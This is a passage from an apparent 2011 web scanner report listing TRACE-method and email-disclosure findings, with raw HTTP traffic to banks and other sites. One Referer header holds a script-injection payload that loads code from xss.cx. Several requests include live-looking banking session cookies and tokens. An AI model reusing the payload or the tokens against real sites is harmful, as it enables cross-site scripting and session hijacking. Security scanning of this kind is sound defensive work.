Cookie: d474945db1831f1b; 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24


17.3. http://sensor2.suitesmart.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sensor2.suitesmart.com
Cookie: 90dc1cad793409aa

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sensor2.suitesmart.com
Cookie: 90dc1cad793409aa; spass=639dc8c25a6771ff844957f2a2748213; G12546=C1S98727-3-0-0-0-1311017115-2; G15482=C1S103937-43-0-0-0-1311016999-23706


17.4. http://www.defaultroute.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.defaultroute.com
Cookie: 76fb7c25f180f4b

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:45 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.defaultroute.com
Cookie: 76fb7c25f180f4b


17.5. https://www.wellsfargoadvisors.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wellsfargoadvisors.com
Cookie: 632935df9780b39b

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:53:09 GMT
Server: IBM_HTTP_Server
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wellsfargoadvisors.com
Cookie: 632935df9780b39b


18. Email addresses disclosed
There are 19 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


18.1. http://ads1.msads.net/library/dap.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.msads.net
Path:   /library/dap.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/dap.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads1.msads.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=172800
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Age: 62688
Date: Tue, 19 Jul 2011 12:13:18 GMT
Last-Modified: Mon, 13 Jun 2011 17:27:41 GMT
Expires: Wed, 20 Jul 2011 18:48:30 GMT
Content-Length: 13811
Connection: keep-alive


var _daprr=new Array('http://rad.msn.com/ADSAdClient31.dll?GetSAd=','http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=', 'http://b.rad.msn.com/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

18.2. http://ads1.msn.com/library/dap.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /library/dap.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/dap.js HTTP/1.1
Host: ads1.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scout.com/search.aspx?s=143&p=19&sitesearch=scout.com&q=1%3CScRiPt%2Fxss%20src%3Dhttp%3A%2F%2Fxss.cx%2Fcx.js%3F964407%3E%3C%2FScRiPt%3E
Cookie: MC1=V=3&GUID=af7f3bc9414d4d7f98f7762d0ecd4c67; mh=LENOVO; CULTURE=EN-US; MSNRPSShare=1; MUID=3957719BE8F34A5DA51D204E7E06704A; Sample=87; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; expid=id=a7ed379634844c0891f7fd0905cd7d4e&bd=2011-07-02T23:40:18.696&v=2; SRCHHPGUSR=AS=1; MSNTVID=af7f3bc9414d4d7f98f7762d0ecd4c67; CC=US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:04:43 GMT
Expires: Tue, 19 Jul 2011 17:38:27 GMT
Last-Modified: Mon, 13 Jun 2011 17:27:41 GMT
Cache-Control: max-age=172800
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 13811


var _daprr=new Array('http://rad.msn.com/ADSAdClient31.dll?GetSAd=','http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=', 'http://b.rad.msn.com/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

18.3. https://onlineservices.wachovia.com/identity/IdentityMgr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /identity/IdentityMgr

Issue detail

The following email address was disclosed in the response:

Request

GET /identity/IdentityMgr?action=secondaryPresentLogin&nextpage=PWRESET&returnurl=http%3a//www.wachovia.com HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069112331-New%7C1342605112331%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%255E%255EReset%2520your%2520password%255E%255E/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%2520%257C%2520Reset%2520your%2520password%255E%255E%3B%20s_sq%3Dwachoviaglobal%252Cwachovialive%253D%252526pid%25253D/Wachovia%25252520Miscellaneous/Home/Forgot%25252520Password%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//onlineservices.wachovia.com/identity/IdentityMgr%2525253Faction%2525253DsecondaryPresentLogin%25252526nextpage%2525253DPW_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; CookiesAreEnabled=yes

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:52:56 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-frames-option: deny
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 18355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<span class="small">onlineservices@wachovia.com</span>
...[SNIP]...

18.4. https://secure2.internode.on.net/nodestore/checkout/customer/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore/checkout/customer/

Issue detail

The following email address was disclosed in the response:

Request

GET /nodestore/checkout/customer/ HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
Referer: https://secure2.internode.on.net/nodestore/products/residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nodestore_session=2cdf3c71-baba97f6-2cdf3c70-baba97f6-00000002-qm5papuuccc7vpckhvg6v67vv7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 10:08:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 24416
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>Welcome :: NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, p
...[SNIP]...
<input type="email" name="email_address_existing" id="email_address_existing" value="" helper="formEmail" autocomplete="off" class="email_address" placeholder="example@example.com">
...[SNIP]...
<input type="email" name="email_address" id="email_address" value="" helper="formEmail" autocomplete="off" class="email_address" placeholder="example@example.com">
...[SNIP]...

18.5. http://widgets.twimg.com/j/2/widget.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.css

Issue detail

The following email address was disclosed in the response:

Request

GET /j/2/widget.css HTTP/1.1
Host: widgets.twimg.com
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: yFPEo7/5CTnxmKnUEjXU1/OmPGPsNh0IMRRhNdN4WTdj8fNE1ntiR92x6Uowmhmg
x-amz-request-id: DD5E22500AC48FB0
Date: Sun, 08 May 2011 02:35:35 GMT
Expires: Sat, 27 Feb 2021 01:15:01 GMT+00:00
Last-Modified: Wed, 02 Mar 2011 01:15:13 GMT
ETag: "9842b420d8c91a4cbb004d17a5d54054"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3430
Server: AmazonS3
Age: 6218666
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 640f5f5076f34cd938d9dfd8fb99d6fdf24a657f1b06c2505ac948dcdea79fde318f49be8c544d73
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 6f4c292df8fb7b5bd5bfa8aff66748aa.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

18.6. http://widgets.twimg.com/j/2/widget.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.js

Issue detail

The following email address was disclosed in the response:

Request

GET /j/2/widget.js HTTP/1.1
Host: widgets.twimg.com
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: ZkuDk/yfZr5+3RiP/dOR8x+1/sInvNiuo89zrDBsMmP3FxSBfsSBX0L1xZo92idx
x-amz-request-id: CAC1EF4139F59170
Date: Wed, 15 Jun 2011 00:49:37 GMT
Last-Modified: Fri, 08 Apr 2011 20:34:17 GMT
ETag: "8f109f7ba100454bc391fc07377c1aed"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 31383
Server: AmazonS3
Age: 66275
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: e0da31d53eba4468ecd847ff678aa11492bc91dd54863415154135e482e103d69f7ef704db311c8b
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 6f4c292df8fb7b5bd5bfa8aff66748aa.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

18.7. http://www.codero.com/css/screen.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codero.com
Path:   /css/screen.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/screen.css HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:49 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 06 May 2009 19:56:12 GMT
ETag: "43f7d0-f6-c98c8f00"
Accept-Ranges: bytes
Cache-Control: max-age=0, proxy-revalidate
Expires: Tue, 19 Jul 2011 01:59:49 GMT
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 246
Content-Type: text/css

/*
File: screen.css
Theme: Codero
Author: Bryce Nill
email: brycen@aplus.net
*/

/* import stylesheets and hide from ie/mac \*/
@import url("reset.css");
@import url("grid.css");
@import url("style.css");
/* end import/hide */

18.8. http://www.codero.com/css/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codero.com
Path:   /css/style.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/style.css HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:52 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 15 Jul 2011 21:12:57 GMT
ETag: "43f173-18c16-1d134840"
Accept-Ranges: bytes
Cache-Control: max-age=0, proxy-revalidate
Expires: Tue, 19 Jul 2011 01:59:52 GMT
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 101398
Content-Type: text/css

/*
File: style.css
Theme: Codero
Author: Bryce Nill
email: brycen@aplus.net
*/

/*--------------------------------------------------
   Typography
--------------------------------------------------*/

body {font: 12px Arial, Helvetica, sans-serif; color: #4d4d4d;}
#oute
...[SNIP]...

18.9. http://www.codero.com/js/hoverIntent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codero.com
Path:   /js/hoverIntent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/hoverIntent.js HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:49 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 13 Jul 2011 21:47:42 GMT
ETag: "43f175-8dd-5dab1b80"
Accept-Ranges: bytes
Cache-Control: max-age=0, proxy-revalidate
Expires: Tue, 19 Jul 2011 01:59:49 GMT
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 2269
Content-Type: application/javascript

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @pa
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

18.10. http://www.defaultroute.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.defaultroute.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- putting fonts here bec
...[SNIP]...
<a href="mailto:info@defaultroute.com">info@defaultroute.com</a>
...[SNIP]...

18.11. http://www.defaultroute.com/category/founders/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /category/founders/

Issue detail

The following email address was disclosed in the response:

Request

GET /category/founders/ HTTP/1.1
Host: www.defaultroute.com
Proxy-Connection: keep-alive
Referer: http://www.defaultroute.com/services/thenetwork/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152370604.79046687.1311040794.1311040794.1311040794.1; __utmb=152370604.2.10.1311040794; __utmc=152370604; __utmz=152370604.1311040794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 10607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- putting fonts here bec
...[SNIP]...
<a href="mailto:info@defaultroute.com">info@defaultroute.com</a>
...[SNIP]...

18.12. http://www.defaultroute.com/services/thenetwork/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /services/thenetwork/

Issue detail

The following email address was disclosed in the response:

Request

GET /services/thenetwork/ HTTP/1.1
Host: www.defaultroute.com
Proxy-Connection: keep-alive
Referer: http://www.defaultroute.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152370604.79046687.1311040794.1311040794.1311040794.1; __utmb=152370604.1.10.1311040794; __utmc=152370604; __utmz=152370604.1311040794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Link: <http://www.defaultroute.com/?p=567>; rel=shortlink
Content-Type: text/html; charset=UTF-8
Content-Length: 10570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- putting fonts here bec
...[SNIP]...
<a href="mailto:info@defaultroute.com">info@defaultroute.com</a>
...[SNIP]...

18.13. https://www.torservers.net/donate.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /donate.html

Issue detail

The following email address was disclosed in the response:

Request

GET /donate.html HTTP/1.1
Host: www.torservers.net
Connection: keep-alive
Referer: https://www.torservers.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31556926;includeSubDomains
X-Content-Security-Policy: allow 'self' *.torservers.net
Content-type: text/html
Date: Tue, 19 Jul 2011 01:59:32 GMT
Server: lighttpd
Content-Length: 24791

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<input type="hidden" value="donate@torservers.net" name="pay_to_email"/>
...[SNIP]...
<input type="hidden" value="mailto:donate@torservers.net" name="status_url"/>
...[SNIP]...
<input type="hidden" value="donate@torservers.net" name="pay_to_email"/>
...[SNIP]...
<input type="hidden" value="mailto:donate@torservers.net" name="status_url"/>
...[SNIP]...
<input type="hidden" name="business" value="donate@torservers.net"/>
...[SNIP]...
<input name='business' type='hidden' value='donate@torservers.net' />
...[SNIP]...

18.14. https://www.wachovia.com/common_files/metrics/vignette/stats.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /common_files/metrics/vignette/stats.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common_files/metrics/vignette/stats.js HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
Referer: https://www.wachovia.com/enroll
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=920DCE66B1EC10B13488C08483F0D444; JSESSIONID=0000nkyzwrL8tsfz1ZrPhM0ci7Q:13jgrcho1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:50:46 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 30 Mar 2011 01:00:15 GMT
Accept-Ranges: bytes
Cache-Control: max-age=-8412631
Expires: Wed, 13 Apr 2011 01:00:15 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Length: 44963
Keep-Alive: timeout=10, max=25
Connection: Keep-Alive
Content-Type: application/x-javascript

/* Omniture SiteCatalyst Code */
var sc_code_ver="v 5.5"

/* REPORT SUITE ID SET PRIOR TO OMNI CODE CALL */
if(!s_account) var s_account="wachoviaglobal"
var s=s_gi(s_account)

/************* D
...[SNIP]...
#K=#W($L,(vt$4t`cvt)"
+"`Ys.hav()+q+(qs?qs:s.rq(^7)),0,id,ta);qs`h;`Rm('t')`5s.p_r)s.p_r(`I`d`h}^J(qs);^T`v($E;`k$E`e^3,`H$X1',vb`I@Q=^H=s.`Q`s=s.`Q^4=`G`o`h`5s.pg)`G^z@Q=`G^zeo=`G^z`Q`s=`G^z`Q^4`h`5!id@8s.tc@3tc=1;s.flus"
+"h`V()}`3#K`Ctl`0o,t,n,vo`2;s.@Q=$Po`I`Q^4=t;s.`Q`s=n;s.t($E}`5pg){`G^zco`0o){`N^t\"_\",1,$I`3$Po)`Cwd^zgs`0u$6`N^tun,1,$I`3s.t()`Cwd^zdc`0u$6`N^tun,$I`3s.t()}}@El=(`G`M`m`9`4'@Ss@20`I
...[SNIP]...

18.15. https://www.wellsfargo.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/

Issue detail

The following email address was disclosed in the response:

Request

GET /help/ HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; JSESSIONID=4EF7C30A5EF0B45DD6E1DC6B95DC840E; BRAND_COOKIE=COB; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

